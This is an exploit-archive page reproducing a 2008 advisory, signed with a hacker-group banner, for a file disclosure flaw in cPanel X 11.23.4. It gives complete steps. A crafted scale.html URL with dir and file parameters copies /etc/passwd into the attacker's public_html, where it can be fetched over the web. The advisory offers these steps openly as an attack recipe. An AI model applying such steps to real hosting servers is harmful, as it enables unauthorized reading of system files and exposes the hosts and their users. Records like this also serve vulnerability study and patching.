Cpanel X File Disclosure Vulnerability

2008.08.23
Credit: Encrypt3d.M!nd
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

######## ## ## ###### ######## ## ## ######## ######## ####### ######## ## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## #### ## ## ## ## #### ## ## ## ## ## ## ###### ## ## ## ## ######## ## ######## ## ####### ## ## ## ## #### ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## ## ## ## ## ## ## ######## ## ## ###### ## ## ## ## ## ####### ######## #################################################################################### ################################ !R4Q!4N H4CK3R ################################### #################################################################################### # # Cpanel X File Disclosure Vulnerability # # Tested on cPanel Version 11.23.4-RELEASE # other versions might be affected # # Founded By : Encrypt3d.M!nd # encrypt3d.blogspot.com # #################################################################################### # Description : Cpanel X Suffering a File Disclosure Vulnerability wich let the attacker reading files he has no premission to read it.For Example:/etc/passwd # Exploit : You Must have a premission to access the Cpanel. Login and goto: "site.com:2082/frontend/x3/cpanelpro/scale.html?dir=%2fetc&file=passwd" for reading /etc/passwd then click on "Retain a copy of the old image as" and type the path of your account for Example: "/home/user/public_html/passwd" Note:passwd is a file not a directory then click on "Scale Image" then goto "http://yoursite.com/passwd" by your browser you will see the /etc/passwd # End


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top